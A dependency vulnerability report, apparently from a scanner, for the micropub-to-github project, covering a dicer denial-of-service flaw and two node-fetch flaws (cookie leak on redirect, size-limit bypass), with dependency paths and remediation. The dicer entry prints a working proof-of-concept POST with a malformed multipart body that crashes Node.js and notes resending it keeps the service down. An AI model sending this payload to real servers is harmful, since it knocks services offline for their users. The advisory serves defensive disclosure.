high severity
- Vulnerable module: dicer
- Introduced through: micropub-express@0.8.1
Detailed paths
- Introduced through: micropub-to-github@voxpelli/webpage-micropub-to-github#f71d6dc3aa8549ee0036118d794867c6dc706607 › micropub-express@0.8.1 › multer@1.4.4 › busboy@0.2.14 › dicer@0.2.5
Overview
Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can send a malformed multipart form to the server and crash the Node.js process; the request needs no authentication and can be replayed, so the service can be kept down for as long as the attacker keeps sending it.
PoC (as given; the body's only part header line begins with a space, i.e. a folded continuation line with no preceding header):
// One POST to the upload route is enough; resend it to keep the service down.
fetch('form-image', {
  method: 'POST',
  headers: {
    ['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro',
    ['content-length']: '145',
    host: '127.0.0.1:8000',
    connection: 'keep-alive',
  },
  // Note the space before "Content-Disposition": this is the malformed part.
  body: '------WebKitFormBoundaryoo6vortfDzBsDiro\r\n Content-Disposition: form-data; name="bildbeschreibung"\r\n\r\n\r\n------WebKitFormBoundaryoo6vortfDzBsDiro--'
});
Remediation
There is no fixed version for dicer. Since dicer reaches this project only through multer@1.4.4 › busboy@0.2.14, the dependency path, not dicer itself, is where a fix has to come from.
medium severity
- Vulnerable module: node-fetch
- Introduced through: github-publish@3.0.0 and micropub-express@0.8.1
Detailed paths
- Introduced through: micropub-to-github@voxpelli/webpage-micropub-to-github#f71d6dc3aa8549ee0036118d794867c6dc706607 › github-publish@3.0.0 › node-fetch@1.7.3
  Remediation: Upgrade to github-publish@4.0.0.
- Introduced through: micropub-to-github@voxpelli/webpage-micropub-to-github#f71d6dc3aa8549ee0036118d794867c6dc706607 › micropub-express@0.8.1 › node-fetch@1.7.3
Overview
node-fetch is a light-weight module that brings window.fetch to node.js
Affected versions of this package are vulnerable to Information Exposure. When a remote URL is fetched with a Cookie header and the response carries a Location header, node-fetch follows the redirect and sends the same Cookie header to the new URL, even when that URL belongs to a different origin. Credential-bearing headers are thereby forwarded to a third party.
Remediation
Upgrade node-fetch to version 2.6.7, 3.1.1 or higher.
medium severity
- Vulnerable module: node-fetch
- Introduced through: github-publish@3.0.0 and micropub-express@0.8.1
Detailed paths
- Introduced through: micropub-to-github@voxpelli/webpage-micropub-to-github#f71d6dc3aa8549ee0036118d794867c6dc706607 › github-publish@3.0.0 › node-fetch@1.7.3
  Remediation: Upgrade to github-publish@4.0.0.
- Introduced through: micropub-to-github@voxpelli/webpage-micropub-to-github#f71d6dc3aa8549ee0036118d794867c6dc706607 › micropub-express@0.8.1 › node-fetch@1.7.3
Overview
node-fetch is a light-weight module that brings window.fetch to node.js
Affected versions of this package are vulnerable to Denial of Service (DoS). node-fetch did not honor the size option after following a redirect: when the redirected response exceeded the limit, no FetchError was thrown and the request completed without error, so the caller consumed the oversized body in full.
Remediation
Upgrade node-fetch to version 2.6.1, 3.0.0-beta.9 or higher.